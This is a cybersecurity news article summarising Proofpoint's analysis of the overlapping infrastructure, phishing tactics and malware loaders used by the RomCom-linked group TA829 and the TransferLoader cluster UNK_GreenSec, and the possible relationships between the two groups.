TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns
Cybersecurity researchers have flagged the tactical similarities between the threat actors behind the RomCom RAT and a cluster that has been observed delivering a loader dubbed TransferLoader.
Enterprise security firm Proofpoint is tracking the activity associated with TransferLoader to a group dubbed UNK_GreenSec and the RomCom RAT actors under the moniker TA829. The latter is also known by the names CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu.
The company said it discovered UNK_GreenSec as part of its investigation into TA829, describing it as using an “unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes.”
TA829 is something of an unusual hacking group in the threat landscape given its ability to conduct both espionage as well as financially motivated attacks. The Russia-aligned hybrid group has also been linked to the zero-day exploitation of security flaws in Mozilla Firefox and Microsoft Windows to deliver RomCom RAT in attacks aimed at global targets.
Earlier this year, PRODAFT detailed the threat actors’ use of bulletproof hosting providers, living-off-the-land (LOTL) tactics, and encrypted command-and-control (C2) communications to sidestep detection.
TransferLoader, on the other hand, was first documented by Zscaler ThreatLabz in connection with a February 2025 campaign that delivered the Morpheus ransomware against an unnamed American law firm.
Proofpoint noted that campaigns undertaken by both TA829 and UNK_GreenSec rely on REM Proxy services that are deployed on compromised MikroTik routers for their upstream infrastructure. That said, the exact method used to breach these devices is not known.
“REM Proxy devices are likely rented to users to relay traffic,” the Proofpoint threat research team said. “In observed campaigns, both TA829 and UNK_GreenSec use the service to relay traffic to new accounts at freemail providers to then send to targets. REM Proxy services have also been used by TA829 to initiate similar campaigns via compromised email accounts.”
Given that the format of the sender addresses are similar — e.g., [email protected] and [email protected] — it’s believed that the threat actors are likely using some sort of an email builder utility that facilitates the en masse creation and sending of phishing emails via REM Proxy nodes.
The messages act as a conduit to deliver a link, which is either directly embedded in the body or within a PDF attachment. Clicking on the link initiates a series of redirections via Rebrandly that ultimately take the victim to a fake Google Drive or Microsoft OneDrive page, while filtering out machines that have been flagged as sandboxes or deemed not of interest to the attackers.
It’s at this stage that the attack chains splinter into two, as the adversary infrastructure to which the targets are redirected is different, ultimately paving the way for TransferLoader in the case of UNK_GreenSec and a malware strain called SlipScreen in the case of TA829.
“TA829 and UNK_GreenSec have both deployed Putty’s PLINK utility to set up SSH tunnels, and both used IPFS services to host those utilities in follow-on activity,” Proofpoint noted.
SlipScreen is a first-stage loader that’s designed to decrypt and load shellcode directly into memory and initiate communications with a remote server, but only after a Windows Registry check to ensure the targeted computer has at least 55 recent documents based on the “HKCUSOFTWAREMicrosoftWindowsCurrentVersionExplorerRecentDocs” key.
The infection sequence is then used to deploy a downloader named MeltingClaw (aka DAMASCENED PEACOCK) or RustyClaw, which is then used to drop backdoors like ShadyHammock or DustyHammock, with the former being used to launch SingleCamper (aka SnipBot), an updated version of RomCom RAT.
DustyHammock, besides running reconnaissance commands on an infected system, comes fitted with the ability to download additional payloads hosted on the InterPlanetary File System (IPFS) network.
Campaigns propagating TransferLoader have been found to leverage job opportunity-themed messages to trick victims into clicking on a link that ostensibly leads to a PDF resume, but, in reality, results in the download of TransferLoader from an IPFS webshare.
TransferLoader’s primary objective is to fly under the radar and serve more malware, such as Metasploit and Morpheus ransomware, a rebranded version of HellCat ransomware.
“Unlike the TA829 campaigns, the TransferLoader campaigns’ JavaScript components redirected users to a different PHP endpoint on the same server, which allows the operator to conduct further server-side filtering,” Proofpoint said. “UNK_GreenSec used a dynamic landing page, often irrelevant to the OneDrive spoof, and redirected users to the final payload that was stored on an IPFS webshare.”
The overlapping tradecraft between TA829 and UNK_GreenSec raises one of the four possibilities –
- The threat actors are procuring distribution and infrastructure from the same third-party provider
- TA829 acquires and distributes infrastructure on its own, and has provided these services to UNK_GreenSec
- UNK_GreenSec is the infrastructure provider that typically offers its warez to TA829, but decided to temporarily use it to deliver its own malware, TransferLoader
- TA829 and UNK_GreenSec are one and the same, and TransferLoader is a new addition to their malware arsenal
“In the current threat landscape, the points at which cybercrime and espionage activity overlap continue to increase, removing the distinctive barriers that separate criminal and state actors,” Proofpoint said. “Campaigns, indicators, and threat actor behaviors have converged, making attribution and clustering within the ecosystem more challenging.”
“While there is not sufficient evidence to substantiate the exact nature of the relationship between TA829 and UNK_GreenSec, there is very likely a link between the groups.”
